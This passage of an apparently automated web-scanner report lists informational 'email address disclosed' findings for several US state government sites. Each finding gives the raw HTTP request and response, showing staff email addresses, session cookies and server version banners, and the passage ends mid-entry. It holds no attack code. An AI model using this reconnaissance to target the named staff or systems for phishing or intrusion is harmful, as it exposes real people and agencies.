Cache-Control: public, max-age=86400
Content-Type: application/x-javascript

/*
* CrossSlide jQuery plugin v0.4.2
*
* Copyright 2007-2010 by Tobia Conforto <tobia.conforto@gmail.com>
*
* This program is free software; you can redistribute it and/or modify it
* unde
...[SNIP]...

22.74. http://mibid.bidcorp.com/ActiveAuctions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mibid.bidcorp.com
Path:   /ActiveAuctions.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ActiveAuctions.aspx HTTP/1.1
Host: mibid.bidcorp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:22:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...
<a href="mailto:mibidinfo@michigan.gov?subject=Comments%20regarding%20MiBid%20Auctions">
...[SNIP]...
<a href="mailto:LanctoK@michigan.gov?cc=mibidinfo@michigan.gov&subject=Comments%20regarding%20MiBid%20Auctions">
...[SNIP]...

22.75. http://mibid.bidcorp.com/AuctionDetails.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mibid.bidcorp.com
Path:   /AuctionDetails.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /AuctionDetails.aspx HTTP/1.1
Host: mibid.bidcorp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:22:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...
<a href="mailto:mibidinfo@michigan.gov?subject=Comments%20regarding%20MiBid%20Auctions">
...[SNIP]...
<a href="mailto:LanctoK@michigan.gov?cc=mibidinfo@michigan.gov&subject=Comments%20regarding%20MiBid%20Auctions">
...[SNIP]...

22.76. http://mibid.bidcorp.com/EndingAuctions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mibid.bidcorp.com
Path:   /EndingAuctions.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /EndingAuctions.aspx HTTP/1.1
Host: mibid.bidcorp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18662


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...
<a href="mailto:mibidinfo@michigan.gov?subject=Comments%20regarding%20MiBid%20Auctions">
...[SNIP]...
<a href="mailto:LanctoK@michigan.gov?cc=mibidinfo@michigan.gov&subject=Comments%20regarding%20MiBid%20Auctions">
...[SNIP]...

22.77. https://mibid.bidcorp.com/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mibid.bidcorp.com
Path:   /Login.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

POST /Login.aspx HTTP/1.1
Host: mibid.bidcorp.com
Connection: keep-alive
Referer: https://mibid.bidcorp.com/Login.aspx
Cache-Control: max-age=0
Origin: https://mibid.bidcorp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2076

__LASTFOCUS=&__EVENTTARGET=ctl00%24LoginStatus1%24ctl02&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIwNjUyNTAwOQ9kFgJmD2QWAgIDD2QWAgIBDzwrAA0CAA8WAh4LXyFEYXRhQm91bmRnZAwUKwACBQMwOjAUKwACFg4eBFRleHQFBEhvb
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 01:31:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /login.aspx?ReturnUrl=%2fLogin.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20321

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2flogin.aspx%3fReturnUrl%3d%252fLogin.aspx">here</a>.</h2>
</body></html>


<!DOCTYPE html PUBLIC "-//W3C//DTD X
...[SNIP]...
<a href="mailto:mibidinfo@michigan.gov?subject=Comments%20regarding%20MiBid%20Auctions">
...[SNIP]...
<a href="mailto:LanctoK@michigan.gov?cc=mibidinfo@michigan.gov&subject=Comments%20regarding%20MiBid%20Auctions">
...[SNIP]...

22.78. http://nc.gov/1222,1222,Online_Services,Online_Services.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nc.gov
Path:   /1222,1222,Online_Services,Online_Services.html

Issue detail

The following email address was disclosed in the response:

Request

GET /1222,1222,Online_Services,Online_Services.html HTTP/1.1
Host: nc.gov
Proxy-Connection: keep-alive
Referer: http://nc.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NRVYIRS207.192.33.105CKOOL; ASP.NET_SessionId=2hmaohuojo0dkm45eip25055; NCGOVLinks=Tree

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:35:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: public, max-age=215698
Expires: Mon, 02 May 2011 12:30:07 GMT
Last-Modified: Sat, 30 Apr 2011 00:35:07 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 42007


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>NC.GOV -
           Home</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
       <meta nam
...[SNIP]...
ndefined")||(ob_tree_js_version!="505")){if (confirm("Property 'FolderIcons' has wrong path\nor file 'ob_tree_505.js' is not there.\n \n \nClick OK to see how to use property FolderIcons\nor contact support@obout.com")){window.location="http://www.obout.com/t2/ht_howto.aspx?id=a25#q25";}}</SCRIPT>
...[SNIP]...

22.79. http://nc.gov/directory.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nc.gov
Path:   /directory.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /directory.aspx HTTP/1.1
Host: nc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NCGOVLinks=Tree; ARPT=NRVYIRS207.192.33.105CKOOL; ASP.NET_SessionId=2hmaohuojo0dkm45eip25055;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:23:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22130


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>NCGOV -
           
       </title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta cont
...[SNIP]...
<a href="mailto:brenda.partin@doa.nc.gov">
...[SNIP]...
<a href="mailto:switchboard@ncmail.net?subject=Question on State Employee Phone Listing">
...[SNIP]...

22.80. http://ncchildcaresearch.dhhs.state.nc.us/search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ncchildcaresearch.dhhs.state.nc.us
Path:   /search.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /search.asp HTTP/1.1
Host: ncchildcaresearch.dhhs.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:43:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 70584
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACTBSQRB=KNOKANEBGOHFMJLJBNCLEOCJ; path=/
Cache-control: private

<!-- Setting up the data source. To change the Data Source used in this website,
change the DSN_Name -->


<html>
<head>
<title>NC Div of Child Development- Searching Resources in Child Care </
...[SNIP]...
<!META NAME="contactNetworkAddress" CONTENT="mail@dhr.state.nc.us">
...[SNIP]...

22.81. http://newmexico.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newmexico.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: newmexico.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Apr 2011 11:13:43 GMT
Server:
Location: http://www.newmexico.gov
Content-Length: 331
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.newmexico.go
...[SNIP]...
<a href="mailto:doit-web@state.nm.us">
...[SNIP]...

22.82. https://nhlicenses.nh.gov/MyLicense%20Enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses.nh.gov
Path:   /MyLicense%20Enterprise/

Issue detail

The following email address was disclosed in the response:

Request

GET /MyLicense%20Enterprise/ HTTP/1.1
Host: nhlicenses.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0oojxnnvs3qut4rouxmi2bnj

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:41:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 6524
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <link rel="stylesheet" href="stylesheets/elicense2000.css">
       <META HTTP-EQUIV="Expires" CONTENT="0">
       <META
...[SNIP]...
<a href="mailto:NHLicenses@nh.gov" class="smlink">
...[SNIP]...

22.83. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /cgi-bin/professional/nhprof/license.pl

Issue detail

The following email addresses were disclosed in the response:

Request

GET /cgi-bin/professional/nhprof/license.pl?board_code=BOA HTTP/1.1
Host: nhlicenses2.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:41:46 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14326
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive

<html><head>
<meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
<title>New Hampshire licensing service</title>
<base href="https://nhlicenses2.nh.gov/professional/categories/">
<s
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...
<a href="mailto:lcollier@boa.state.nh.us">
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...

22.84. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /cgi-bin/professional/nhprof/license.pl

Issue detail

The following email addresses were disclosed in the response:

Request

GET /cgi-bin/professional/nhprof/license.pl?board_code=NCARB HTTP/1.1
Host: nhlicenses2.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:41:50 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9693
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive

<html><head>
<meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
<title>New Hampshire licensing service</title>
<base href="https://nhlicenses2.nh.gov/professional/categories/">
<s
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...
<a href="mailto:kgray@nhsa.state.nh.us">
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...

22.85. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /cgi-bin/professional/nhprof/license.pl

Issue detail

The following email addresses were disclosed in the response:

Request

GET /cgi-bin/professional/nhprof/license.pl?board_code=ENG HTTP/1.1
Host: nhlicenses2.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:41:48 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13271
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive

<html><head>
<meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
<title>New Hampshire licensing service</title>
<base href="https://nhlicenses2.nh.gov/professional/categories/">
<s
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...
<a href="mailto:dlobdell@nhsa.state.nh.us">
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...

22.86. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/training.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /cgi-bin/professional/nhprof/training.pl

Issue detail

The following email addresses were disclosed in the response:

Request

GET /cgi-bin/professional/nhprof/training.pl?board_code=SIT HTTP/1.1
Host: nhlicenses2.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:42:40 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9322
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive

<html><head>
<meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
<title>New Hampshire licensing service</title>
<base href="https://nhlicenses2.nh.gov/professional/categories/">
<s
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...
<a href="mailto:dlobdell@nhsa.state.nh.us">
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...

22.87. https://nhlicenses2.nh.gov/professional/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /professional/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /professional/ HTTP/1.1
Host: nhlicenses2.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:41:22 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 13:37:05 GMT
ETag: "3b4833-242a-74dc2240"
Accept-Ranges: bytes
Content-Length: 9258
Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive

<html>
   <head>
       <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
       <title>New Hampshire license renewal service</title>
       <style media="screen" type="text/css"><!--
       a { text-
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...
<a href="mailto:dlobdell@nhsa.state.nh.us">
...[SNIP]...
<a href="mailto:dlobdell@nhsa.state.nh.us">
...[SNIP]...
<a href="mailto:kgray@nhsa.state.nh.us">
...[SNIP]...
<a href="mailto:BOA@nh.gov">
...[SNIP]...
<a href="mailto:wcm@nh.gov">
...[SNIP]...

22.88. http://nv.gov/GovPR.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nv.gov
Path:   /GovPR.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /GovPR.aspx HTTP/1.1
Host: nv.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:24:04 GMT
Connection: close
Content-Length: 1819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a href="mailto:mskinner@gov.nv.gov">mskinner@gov.nv.gov</a>
...[SNIP]...

22.89. http://nv.gov/WorkArea/java/ektron.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nv.gov
Path:   /WorkArea/java/ektron.js

Issue detail

The following email address was disclosed in the response:

Request

GET /WorkArea/java/ektron.js HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 172238
Content-Type: text/javascript
Last-Modified: Wed, 25 Nov 2009 16:17:30 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:14:35 GMT

if ("undefined" == typeof $ektron)
{
/*
Ektron JavaScript Library
Copyright (c) 2008 Ektron, Inc.
All rights reserved

Instructions to upgrade this Ektron Li
...[SNIP]...
(Ektron.RegExp.rtrim,""); },

// method to work around bugs in jquery' offset() when element is nested inside relative/absolute elements
// from: http://www.mail-archive.com/jquery-en@googlegroups.com/msg72499.html
positionedOffset: function(elem) {
var offsetParent = elem.offsetParent(), offset = elem.offset(), position = elem.position();
if ( !/^body|html$/i.tes
...[SNIP]...

22.90. http://nv.gov/ext/adapter/ext/ext-base.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nv.gov
Path:   /ext/adapter/ext/ext-base.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ext/adapter/ext/ext-base.js HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 32145
Content-Type: text/javascript
Last-Modified: Wed, 20 Jan 2010 17:40:38 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:14:39 GMT

/*
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
window.undefined=window.undefined;Ext={version:"3.0"};Ext.apply=function(d,e,b){if(b){Ext.apply(d,b)}if(d&&e&&typeof e=="object"){for(var a in e){d[a]=e[a]}}return
...[SNIP]...

22.91. http://nv.gov/ext/ext-all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nv.gov
Path:   /ext/ext-all.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ext/ext-all.js HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 624432
Content-Type: text/javascript
Last-Modified: Wed, 20 Jan 2010 17:42:00 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:14:41 GMT

/*
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
Ext.DomHelper=function(){var s=null,j=/^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i,l=/^table|tbody|tr|td$/i,p,m="afterbegin",n="afterend
...[SNIP]...
\/([\-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;return{email:function(e){return b.test(e)},emailText:'This field should be an e-mail address in the format "user@example.com"',emailMask:/[a-z0-9_\.\-@]/i,url:function(e){return a.test(e)},urlText:'This field should be a URL in the format "http://www.example.com"',alpha:function(e){return c.test(e)},alphaText:"This field sh
...[SNIP]...

22.92. http://nv.gov/ext/resources/css/ext-all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nv.gov
Path:   /ext/resources/css/ext-all.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ext/resources/css/ext-all.css HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 143116
Content-Type: text/css
Last-Modified: Wed, 20 Jan 2010 17:42:00 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:14:39 GMT

/*!
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
html,body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,p,blockquote,th,td{margin:0;padding:0;}img,body,html{border:0;}address,caption,cite,code,d
...[SNIP]...

22.93. http://nv.gov/ext/resources/css/xtheme-blue.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nv.gov
Path:   /ext/resources/css/xtheme-blue.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ext/resources/css/xtheme-blue.css HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
